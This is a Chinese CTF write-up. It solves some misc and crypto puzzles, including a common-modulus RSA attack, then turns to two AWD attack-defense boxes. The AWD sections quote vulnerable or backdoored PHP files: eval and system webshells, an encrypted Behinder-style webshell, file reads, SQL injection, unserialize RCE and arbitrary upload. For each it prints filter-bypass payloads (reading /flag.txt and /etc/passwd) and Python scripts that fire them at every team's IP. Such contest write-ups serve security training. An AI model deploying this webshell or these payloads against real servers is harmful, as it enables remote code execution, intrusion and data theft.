CTF
Misc
Boring_exe
!_
..... ..... ..... ..... !?!!. ?.... ..... ..... ..... .?.?! .?... .!...
..... ..... !.?.. ..... !?!!. ?!!!! !!?.? !.?!! !!!.. ..... ..... .!.?.
..... ...!? !!.?. ..... ..?.? !.?.. ..... .!.?. ..... ..... ..!?! !.?!!
!!!!! !!!!! ?.?!. ?!!!! !!!!! !!!!! !!!.? ..... ..... .!?!! .?... .....
..?.? !.?.. ..... ..... ..!.! !!!!! !!!.! !!!!. ?.... ...!? !!.?. .....
?.?!. ?..!. !!!!! !!!!. !!!!! !!!!. ?.... ..... !?!!. ?.... ....? .?!.?
....! .?.
Ook!密码
Ook!在线解密站:https://tool.bugku.com/brainfuck/
flag{Ookisok}
ezAffine
Daylight
感谢江西师范大学:WAXZ战队师傅提供本题的wp
n=24030381175065789627867818021031309186965318861955402618375094156989560631225056400068280970357343617465261811691559275086986164901405512215968447835573713149231336594364799146504286982124850979481910739400555900516891562640944424296188089156508429086638459243074623801424444379741940400624550247210709108293164193827193821978694274672716764474152393429524314859853376325015012885883855819552203740904895242301492787682366135817255276597250505586595070110209229270379691148517421288247672403709484984083988966720494416926899250840012575481136166618973367329708626081023089829778864549053830890201012932527796486827519
c1=7706442311376298907118381553814187694306437942337200300920018382827744477296762105669322390236380377042026460058526286493515418722731849971411879053724334926597860433790660568227623266459105700578574867980278136078799958698624620338469216407947276632981229373095281141319203245321172350378427449842394930055529441744690732690189155630980736716300509547085032174345753133838250340838995285142338255951756404101946977370148727459867175980397841996210997274012491629791252693401571504945522427861126234928419824136852180508014703063857673244567242488630499415730763245048617632714296374909199028722650732705222178007385
c2=22423938730620301024336096061283705945892027623793660306239291359418958473934583979350384252488494023600239884048653436314101275290157972045454993641659471672605679497398173588217340705125922148550132426481727445141158741816240665812195493040369287582638492321538655028939958996384211181094086886177394010485535445009088322043647955338445795429449360349339936606800994026319620067195422963814641797851423046506617965736694331256799051468484280532276344029152140431817760731420316457245257243157665090587855008596785240088881665435451552191237548113820151383474872494353994135644477990413743416249730006854238049329690
e1=35
e2=42
#python2
import gmpy2
import binascii
import rsa
import math
from Crypto.Util import number
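def exgcd(m, n, x, y):
    """Extended Euclid: return (g, x, y) with m*x + n*y == g == gcd(m, n).

    ``x`` and ``y`` are placeholders kept so the existing call site
    (``exgcd(e1, e2, 0, 0)``) keeps working; they are ignored and the
    Bezout coefficients are returned in the tuple instead.

    Args:
        m, n: integers of arbitrary size (RSA exponents here).
        x, y: unused.

    Returns:
        ``(g, x, y)`` such that ``m*x + n*y == g``; for ``n == 0`` this is
        ``(m, 1, 0)``.
    """
    if n == 0:
        return (m, 1, 0)
    # (a1, b1) are the coefficients of the previous remainder, (a, b)
    # those of the current one; m*a + n*b == d holds after every step.
    a1, b1 = 1, 0
    a, b = 0, 1
    c, d = m, n
    # Floor division, never int(c / d): true division goes through a
    # float and rounds the quotient once the operands exceed 53 bits,
    # which silently corrupts the coefficients for RSA-sized inputs.
    q, r = c // d, c % d
    while r:
        c, d = d, r
        a1, a = a, a1 - q * a
        b1, b = b, b1 - q * b
        q, r = c // d, c % d
    return d, a, b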
# Challenge values (same as listed above): two ciphertexts of one
# plaintext under the same modulus n, with public exponents 35 and 42.
c1=7706442311376298907118381553814187694306437942337200300920018382827744477296762105669322390236380377042026460058526286493515418722731849971411879053724334926597860433790660568227623266459105700578574867980278136078799958698624620338469216407947276632981229373095281141319203245321172350378427449842394930055529441744690732690189155630980736716300509547085032174345753133838250340838995285142338255951756404101946977370148727459867175980397841996210997274012491629791252693401571504945522427861126234928419824136852180508014703063857673244567242488630499415730763245048617632714296374909199028722650732705222178007385
c2=22423938730620301024336096061283705945892027623793660306239291359418958473934583979350384252488494023600239884048653436314101275290157972045454993641659471672605679497398173588217340705125922148550132426481727445141158741816240665812195493040369287582638492321538655028939958996384211181094086886177394010485535445009088322043647955338445795429449360349339936606800994026319620067195422963814641797851423046506617965736694331256799051468484280532276344029152140431817760731420316457245257243157665090587855008596785240088881665435451552191237548113820151383474872494353994135644477990413743416249730006854238049329690
e1=35
e2=42
# gcd(35, 42) == 7, so the common-modulus trick can only reach m**7 mod n.
# Dividing both exponents by that gcd gives coprime 5 and 6, for which
# extended Euclid yields 5*s1 + 6*s2 == 1.
e1=e1//7
e2=e2//7
n=24030381175065789627867818021031309186965318861955402618375094156989560631225056400068280970357343617465261811691559275086986164901405512215968447835573713149231336594364799146504286982124850979481910739400555900516891562640944424296188089156508429086638459243074623801424444379741940400624550247210709108293164193827193821978694274672716764474152393429524314859853376325015012885883855819552203740904895242301492787682366135817255276597250505586595070110209229270379691148517421288247672403709484984083988966720494416926899250840012575481136166618973367329708626081023089829778864549053830890201012932527796486827519
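# Common-modulus attack on the reduced exponents: with s1*e1 + s2*e2 == 1,
# c1**s1 * c2**s2 == m**7 (mod n).  A negative s is handled by powmod,
# which (per gmpy2) uses the modular inverse when one exists.
ans = exgcd(e1, e2, 0, 0)
s1 = ans[1]
s2 = ans[2]
m = (gmpy2.powmod(c1, s1, n) * gmpy2.powmod(c2, s2, n)) % n

# m**7 is only known modulo n.  For a short plaintext m**7 < n and the
# integer root is exact straight away; otherwise try m**7 + k*n for
# increasing k.  The search is capped so a wrong assumption (e.g. the
# exponents not being coprime after the division) fails loudly instead
# of looping forever.
MAX_LIFTS = 100000
root, exact = gmpy2.iroot(m, 7)
print(exact)
lifts = 0
while not exact:
    lifts += 1
    if lifts > MAX_LIFTS:
        raise ValueError("no exact 7th root after %d lifts" % MAX_LIFTS)
    m = m + n
    root, exact = gmpy2.iroot(m, 7)
    print(m)
print(number.long_to_bytes(root))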
flag{1_0nly_see_d4ylight_d4ylight}
Blue
binwalk
分析
foremost
分离
zip伪加密
得到blindsql.pcapng
根据文件名称就知道这是 SQL 盲注的流量包,所以直接过滤出 HTTP 包即可。这里是直接 GET 传参的,可以过滤得更仔细一点:
http.request.method==GET
sql盲注分析
,可以看到flag字段的第一位内容的ascii码为:102
>>> chr(102)
'f'
以此类推
flag{Gre4t_j0B_ON_This_Blue_sh4rk}
Web
Aurora website
上传图片并修改 Content-type;根据提示,得知这里应该是条件竞争:上传的文件在被服务端检查/删除之前存在一个很短的时间窗口,用 burp intruder 不断发包(一边上传、一边请求该文件)即可在窗口内访问到它。
web2(忘了叫啥名)
感谢江西理工大学:Stalker战队师傅的思路
Crypto
EasyRSA
flag{We1c0meCtf3r_elab}
Interceptedtelegram
摩斯密码
.- -.-. - .. ----- -. --.- ..- .. -.-. -.-
摩斯密码在线:http://www.zhongguosou.com/zonghe/moersicodeconverter.aspx
flag{ACTI0NQUICK}
AWD
AWD1
awd1
├── about.php
├── admin
│ ├── footer.php
│ ├── header.php
│ ├── index.php
│ ├── logout.php
│ ├── upload
│ │ ├── 1596596144.png
│ │ ├── 1600179756.php
│ │ ├── 1600180813.exe
│ │ └── .library.php
│ └── upload.php
├── config.php
├── contact.php
├── css
│ ├── bootstrap.css
│ ├── chocolat.css
│ ├── flexslider.css
│ └── style.css
├── data
│ ├── flot-data.js
│ └── morris-data.js
├── footer.php
├── gulpfile.js
├── header.php
├── images
│ ├── 10.jpg
│ ├── 11.jpg
│ ├── 12.jpg
│ ├── 13.jpg
│ ├── 14.jpg
│ ├── 15.jpg
│ ├── 16.jpg
│ ├── 17.jpg
│ ├── 1.jpg
│ ├── 1.png
│ ├── 2.jpg
│ ├── 2.png
│ ├── 3.jpg
│ ├── 3.png
│ ├── 4.jpg
│ ├── 4.png
│ ├── 5.jpg
│ ├── 5.png
│ ├── 6.jpg
│ ├── 7.jpg
│ ├── 8.jpg
│ ├── 9.jpg
│ ├── banner1.jpg
│ ├── banner.jpg
│ ├── close.png
│ ├── co.png
│ ├── img-sp.png
│ ├── left.png
│ └── right.png
├── index.php
├── js
│ ├── bootstrap.js
│ ├── jquery-1.11.1.min.js
│ ├── jquery.chocolat.js
│ ├── jquery.flexslider.js
│ └── sb-admin-2.js
├── less
│ ├── mixins.less
│ ├── sb-admin-2.less
│ └── variables.less
├── login.php
├── search.php
├── ser.php
├── services.php
├── .shell.php
├── single.php
└── Wopop_files
├── askgreen.png
├── errorred.png
├── google_jquery.min.js
├── google_jquery-ui.min.js
├── JQuery.cookie.js
├── jquery.pagination.js
├── jquery.ui.all.css
├── loading1.gif
├── loadingpn.gif
├── login_bgx.gif
├── login.js
├── login_m_bg.png
├── logo.png
├── okgreen.png
├── pagination.css
├── site_bg.png
├── style.css
├── style_log.css
├── userpanel.css
└── webtemples.js
8 directories, 85 files
利用点1
后门文件:awd1/.shell.php
<?php
// Backdoor: whatever arrives in POST "cmd" is handed straight to eval().
// The only "filter" is one non-recursive str_replace of the substring
// "flag", so nesting or splitting the word (flflagag, fl''ag, fl${IFS}ag,
// a base64-encoded path, ...) survives it.
$key = $_POST["cmd"];
if(isset($key)){
    $key = str_replace("flag","",$key);
}
eval($key);
?>
只是把 flag 字符串替换为空:str_replace 只做一次、非递归的替换,所以 flflagag 去掉中间的 flag 后仍会得到 flag;再加上 shell 自身会去掉引号、展开 ${IFS}/空变量等,利用方法很多
cmd=system("cat /flflagag.txt");
cmd=system("cat /fl''ag.txt");
cmd=system("cat /fla'g'.txt");
cmd=system("cat /fl${9}ag.txt");
cmd=system("cat /fl${IFS}ag.txt");
cmd=system("cat /fl\ag.txt");
cmd=system("cat /`echo 'ZmxhZy50eHQ=' | base64 -d`");
........
import requests
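def post_shell(ip_list):
    """POST the flag-reading command to the planted webshell on every target.

    Args:
        ip_list: iterable of host strings (IP or IP:port).

    Each host is handled on its own: a box that is down, firewalled or
    already patched must not abort the sweep over the remaining teams.
    Results (or the error) are printed per host; nothing is returned.
    """
    flag_path = '/.shell.php'  # webshell path
    # The backdoor strips "flag" once, so "flflagag" is what survives as "flag".
    post_data = 'cmd=system("cat /flflagag.txt");'
    for i in ip_list:
        header_info = {
            'Host': i,
            # was misspelled 'User-Agebt', which sent a bogus header and no UA
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
            'Accept-Encoding': 'gzip, deflate',
            'Content-Type': 'application/x-www-form-urlencoded'
        }
        flag_url = 'http://' + i + flag_path
        try:
            # Short timeout: one unreachable target must not stall the round.
            res = requests.post(url=flag_url, data=post_data, headers=header_info, timeout=5)
        except requests.RequestException as exc:
            print("[-]{0}: {1}\n".format(i, exc))
            continue
        print("[+]{0}: {1}\n".format(i, res.text))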
if __name__ == '__main__':
    # One target per team: 172.20.<team>.101 for teams 102 through 112.
    ip_list = ['172.20.%d.101' % team for team in range(102, 113)]
    post_shell(ip_list)
利用点2
任意文件读取:awd1/about.php
<?php
// Arbitrary file read.  Each str_replace runs exactly once, in this fixed
// order, so "flflagag" -> "flag" and "fifile://le://" -> "file://" get
// through.  Nothing strips a leading "/", so a plain absolute path needs
// no trick at all, and php:// wrappers are not filtered either.
$file=$_GET['file'];
$file = str_replace("flag","",$file);
$file = str_replace("../","",$file);
$file = str_replace("..","",$file);
$file = str_replace("file://","",$file);
@print_r(file_get_contents($file));
?>
利用 file:// 伪协议读绝对路径即可,AWD 环境中 flag 的绝对路径都已知:/flag.txt。(过滤器并不处理不带协议的绝对路径,所以直接传 ?file=/flflagag.txt 同样可以读到。)
?file=fifile://le:///flflagag.txt
?file=php://filter/read=convert.base64-encode/resource=/flflagag.txt
......
利用点3
代码执行:awd1/config.php
// document root (left empty)
$basedir = '';
// POST-parameter RCE behind a keyword blacklist.  preg_match inspects the
// raw payload text, so a function name that only comes into existence
// when PHP evaluates the string -- (s.y.s.t.e.m)(...) built by
// concatenation, or a "\x73\x79..." escape sequence -- never matches.
$shell=@$_POST['shell'];
if(preg_match('/(system|exec|shell|file_|call|open|preg|eval|assert|pass|include|require|key)/i', $shell)) {
    exit();
}
@eval($shell);
参数绕过代码执行
shell=(s.y.s.t.e.m)('cat /flag.txt');
shell="\x73\x79\x73\x74\x65\x6d"('cat /flag.txt');
利用点4
任意文件读取:awd1/contact.php(上面的目录树中文件名为 contact.php,这里的 concat.php 应为笔误)
<?php
// Arbitrary file read with no restriction whatsoever: any file the web
// server user can open is returned (only CRLF is rewritten to <br />).
include 'header.php';
$file_path = @$_GET['path'];
if(file_exists($file_path)){
    $fp = fopen($file_path,"r");
    $str = fread($fp,filesize($file_path));
    echo $str = str_replace("\r\n","<br />",$str);
}
?>
?path=/flag.txt
?path=/etc/passwd
利用点5
参数绕过命令执行:awd1/footer.php
<?php
// Command execution behind a tiny blacklist: "cat", a literal space,
// "more" and "flag", case-insensitive.  The right-hand side of && is just
// str_replace(" ","",$shell) tested for truthiness, which is only false
// when the payload collapses to "" or "0" -- it adds no protection.
// The shell undoes the rest: ca''t -> cat, <file instead of a space,
// ${IFS} as whitespace, or a command glued together from variables.
$shell=@$_POST['shell'];
if(preg_match('/(cat|\ |more|flag)/i',$shell)&&str_replace(" ","",$shell)) {
    exit();
}else{
    @system($shell);
}
?>
shell=ca''t</fl''ag.txt
shell=`echo${IFS}Y2F0IC9mbGFnLnR4dAo=|base64${IFS}-d`
shell=a=ca;b=t;c=fl;d=ag;$a$b${IFS}/$c$d.txt
利用点6
注入:awd1/login.php
<?php
// Login: both credentials are interpolated straight into the SQL string
// (no escaping, no prepared statement), so either field is injectable.
// Success requires mysqli_num_rows($data) == 1, so an injected predicate
// must make the query return exactly one row.
include_once('config.php');
if (!empty($_POST['username'])) {
    $user=$_POST['username'];
    $pass=$_POST['password'];
    // (the line breaks inside the string literal are as quoted on this page)
    $query = "SELECT * FROM admin WHERE user_name='{
$user}' and user_pass='{
$pass}' ";
    $data = mysqli_query($dbc,$query);
    if (mysqli_num_rows($data) == 1) {
        $row = mysqli_fetch_array($data);
        $_SESSION['username'] = $row['user_name'];
        header('Location: ./admin/index.php');
    }else{
        // Failure path echoes both inputs back unescaped: reflected XSS as well.
        echo '<hr/><center><br/>用户名:',$user,'<br/>密码:',$pass,'<br/><br/>用户名密码错误</center>';
    }
}
?>
利用点7
注入:awd1/search.php
<?php
// Blacklist in front of a numeric-context query.  $id is unquoted in the
// SQL, so no quote character is needed to inject.  eregi() is not
// binary-safe (a %00 in the input truncates what it inspects), and the
// whole ereg family was removed in PHP 7, so on a PHP 7 build this line
// is a fatal "undefined function" error before any query runs.
include 'header.php';
include_once('config.php');
$id=$_GET['id'];
$check = eregi('select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile', $id);
if($check){
    echo "Invalid strings!!!Please try agine!";
}else{
    $query = "SELECT * FROM news WHERE id=$id";
    $data = mysqli_query($dbc,$query);
    $com = mysqli_fetch_array($data);
}
?>
eregi() 函数不是二进制安全的,可以用 %00 截断它检查的内容,然后进行注入。不过 ereg() 和 eregi() 在 PHP 5.3 已被弃用、在 PHP 7 中被移除;我这里的容器环境是 PHP 7.3,调用 eregi() 时会直接返回致命错误(undefined function),整个 search.php 在执行查询之前就中断了,所以这个利用点在 PHP 7 环境下实际不可用。懒得测试了…
利用点8
反序列化代码执行:awd1/ser.php
<?php
class Smi1e
{
    // Whatever object unserialize() places in ClassObj has its action()
    // invoked from __destruct with no type check, so the attacker picks
    // the class -- the unsafe class below turns that into eval().
    protected $ClassObj;
    function __construct() {
        $this->ClassObj = new safe();
    }
    function __destruct() {
        $this->ClassObj->action();
    }
}
class safe
{
    // Benign target the constructor wires up; only prints a string.
    function action() {
        echo "Here is safe";
    }
}
class unsafe
{
    // Gadget: action() evals the private data property.  Because it is
    // private, the serialized property name is "\0unsafe\0data", which is
    // why the URL-encoded payload further down contains %00 bytes.
    private $data;
    function action() {
        eval($this->data);
    }
}
// Entry point: attacker-controlled serialized data; Smi1e::__destruct
// fires when the temporary object is released right after this call.
unserialize(@$_GET['test']);
直接构造poc
<?php
class Smi1e
{
    // Local copy used only to serialize the payload; ClassObj is swapped
    // to the eval gadget.  NOTE(review): __destruct is kept here too, so
    // when this generator script ends the payload also runs on the
    // author's own machine -- drop __destruct from the local copy.
    protected $ClassObj;
    function __construct() {
        $this->ClassObj = new unsafe();
    }
    function __destruct() {
        $this->ClassObj->action();
    }
}
class unsafe
{
    // Same shape as the target's class, with the command pre-filled so
    // it is carried inside the serialized string.
    private $data="system('cat /flag.txt');";
    function action() {
        eval($this->data);
    }
}
// urlencode() is what turns the NUL bytes around the protected/private
// property names into the %00 sequences in the final ?test= URL.
$res = new Smi1e();
echo urlencode(serialize($res));
?>
?test=O%3A5%3A%22Smi1e%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00ClassObj%22%3BO%3A6%3A%22unsafe%22%3A1%3A%7Bs%3A12%3A%22%00unsafe%00data%22%3Bs%3A24%3A%22system%28%27cat+%2Fflag.txt%27%29%3B%22%3B%7D%7D
PS:吐槽一下出题人写的这个Smi1e
类名,这Smi1e
直接让我看成Smile
。。。。。。。
利用点9
命令执行:awd1/admin/footer.php
<?php
// Unfiltered command execution on POST shell=...; when a command was
// supplied, exit() stops the rest of the page from rendering, so the
// response body is just the command output.
$shell=@$_POST['shell'];
@system($shell);
if($shell !=""){
    exit();
}
?>
shell=cat /flag.txt
利用点10
直接送flag:awd1/admin/index.php
<!-- NOTE(review): this fragment reads /flag; any auth check would be in
     the part of index.php not shown here.  The prose below notes the
     contest flag lived at /flag.txt, so during the match this printed
     nothing. -->
<!-- banner -->
<div class="banner1">
</div>
<!-- //banner -->
<!-- single -->
<div class="single">
<div class="container">
<div class="single-page-artical">
<div class="artical-content">
<h3>flag:<?php print_r(file_get_contents('/flag'));?></h3>
<img class="img-responsive" src="../images/banner.jpg" alt=" " />
<p></p>
</div>
不过我记得比赛的时候,flag的路径及文件名是:/flag.txt
,所以这里比赛的时候是读不出来的
修改为/flag.txt
即可读到flag
利用点11
任意文件上传:awd1/admin/upload.php
<html lang="zh-CN">
<head>
<meta charset="utf-8">
<?php
include_once('../config.php');
if (isset($_SESSION['username'])) {
    include_once('header.php');
    $html_username = htmlspecialchars($_SESSION['username']);
    if(isset($_SESSION['error_info']) && $_SESSION['error_info'] != '') {
        echo $_SESSION['error_info'];
        $_SESSION['error_info'] = '';
    }
}
else {
    // NOTE: redirect without exit -- an unauthenticated request gets a
    // Location header but the upload code below still runs for it.
    header('Location: ../login.php');
}
// error/size/type are read but never checked; there is no MIME or size
// validation anywhere in this file.
$error=$_FILES['pic']['error'];
$tmpName=$_FILES['pic']['tmp_name'];
$name=$_FILES['pic']['name'];
$size=$_FILES['pic']['size'];
$type=$_FILES['pic']['type'];
try{
    if($name!=="")
    {
        // "Extension" = last four characters of the client-supplied name,
        // no whitelist: ".php" passes as-is.
        $name1=substr($name,-4);
        if(is_uploaded_file($tmpName)){
            // Predictable destination name (unix time), and it is echoed
            // back anyway.
            $time=time();
            $rootpath='./upload/'.$time.$name1;
            $file=fopen($tmpName, "r") or die('No such file!');
            $content=fread($file, filesize($tmpName));
            // The only content check: the literal substring 'fuck'.
            if(strstr($content,'fuck')){
                exit("<script language='JavaScript'>alert('You should not do this!');window.location='index.php?page=submit'</script>");
            }
            if(!move_uploaded_file($tmpName,$rootpath)){
                echo "<script language='JavaScript'>alert('文件移动失败!');window.location='index.php?page=submit'</script>";
                exit;
            }
        }
        // Runs even when is_uploaded_file() was false, with $time unset.
        echo "上传成功:/upload/".$time.$name1;
    }
}
catch(Exception $e)
{
    echo "ERROR";
}
//
require('footer.php');
?>
</html>
在awd1/admin/upload/1600179756.php
题目本身存放了一个命令执行后门
//1600179756.php
<?php /* unauthenticated GET webshell shipped with the challenge: ?cmd=... */ system($_GET['cmd']);?>
利用点12
冰蝎马:awd1/admin/upload/.library.php
<?php
// Behinder ("冰蝎") style webshell.
// Handshake: GET ?djicoieDJNCIVD=... makes the shell mint a 16-char key
// (second half of md5(uniqid(rand()))), store it in the session and print
// it; the client encrypts every later request body with that key.
@error_reporting(0);
session_start();
if (isset($_GET['djicoieDJNCIVD']))
{
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}
else
{
    // Without a prior handshake $_SESSION['k'] is unset, so the key is
    // effectively empty -- presumably why encrypting with '' (as in the
    // php -r example further down the page) works against a fresh session.
    $key=$_SESSION['k'];
    $post=file_get_contents("php://input");
    if(!extension_loaded('openssl'))
    {
        // Fallback without openssl: base64, then repeating XOR with the
        // key bytes (index shifted by one, masked to 16).
        $t="base64_"."decode";
        $post=$t($post."");
        for($i=0;$i<strlen($post);$i++) {
            $post[$i] = $post[$i]^$key[$i+1&15];
        }
    }
    else
    {
        $post=openssl_decrypt($post, "AES128", $key);
    }
    // Plaintext is "func|params"; only params is used and it is eval'd
    // inside a throw-away class constructor (presumably to keep "eval("
    // out of the straight-line code that simple scanners grep for).
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{
        public function __construct($p) {
            eval($p."");}}
    @new C($params);
}
?>
冰蝎马:https://www.t00ls.net/articles-56337.html
PS C:\Users\Administrator\Desktop> php -r "echo openssl_encrypt('|system(\'whoami\');','AES128','');"
sbD9xXGKpb2/BSn/O/gPNg0MrbwusxVXLEVTNRXyGcc=
AWD2
利用点1
文件读取直接送flag:ecshop/a.php
<?php
// Any request carrying a "shop" query parameter (value irrelevant) gets
// the contents of /flag.txt -- the base64 string decodes to that path.
if(isset($_GET['shop'])){
    echo file_get_contents(base64_decode('L2ZsYWcudHh0'));}
?>
PS C:\Users\Administrator> php -r "var_dump(base64_decode('L2ZsYWcudHh0'));"
string(9) "/flag.txt"
import requests
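def get_shell(ip_list):
    """Hit the a.php flag dump on every target and print what comes back.

    Args:
        ip_list: iterable of host strings (IP or IP:port).

    a.php only checks isset($_GET['shop']), so any value works.  The query
    string is passed via ``params`` so requests does the encoding and the
    request path stays exactly ``/a.php`` (the old concatenation produced
    ``/a.php/?shop=test``, which only works where the server tolerates
    trailing path info).  Hosts are handled independently so one dead box
    does not abort the sweep.
    """
    flag_path = '/a.php'
    pwd = 'shop'
    command = 'test'
    for i in ip_list:
        flag_url = 'http://' + i + flag_path
        try:
            res = requests.get(url=flag_url, params={pwd: command}, timeout=5)
        except requests.RequestException as exc:
            print("[-]{0}: {1}\n".format(i, exc))
            continue
        print("[+]{0}: {1}\n".format(i, res.text))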
if __name__ == '__main__':
    # One target per team: 172.20.<team>.102 for teams 102 through 112.
    ip_list = ['172.20.%d.102' % team for team in range(102, 113)]
    get_shell(ip_list)
利用点2
命令执行:ecshop/api.php
// Backtick operator is shell_exec(): the s parameter runs verbatim.
$hook = $_GET['s'];
if(isset($hook)){
    echo `$hook`;
}
?s=cat /flag.txt
利用点3
文件读取直接送flag:ecshop/check_file.php
// Same flag dump as a.php: "shop" set -> return /flag.txt.
if(isset($_GET['shop'])){
    echo file_get_contents(base64_decode('L2ZsYWcudHh0'));}
利用点4
文件读取送flag:ecshop/config.php
// NOTE(review): quoted as found on the target -- the first copy is
// truncated ("f(" for "if(") and the block appears twice.  Here the
// base64 decodes to the relative path "flag.txt", which resolves against
// the web server's working directory rather than /, so nothing comes back.
f(isset($_GET['shop'])){
    echo file_get_contents(base64_decode('ZmxhZy50eHQ='));}
?><?php
if(isset($_GET['shop'])){
    echo file_get_contents(base64_decode('ZmxhZy50eHQ='));}
?>
不过这里flag.txt
路径写错了,所以读不出来
PS C:\Users\Administrator> php -r "var_dump(base64_decode('ZmxhZy50eHQ='));"
string(8) "flag.txt"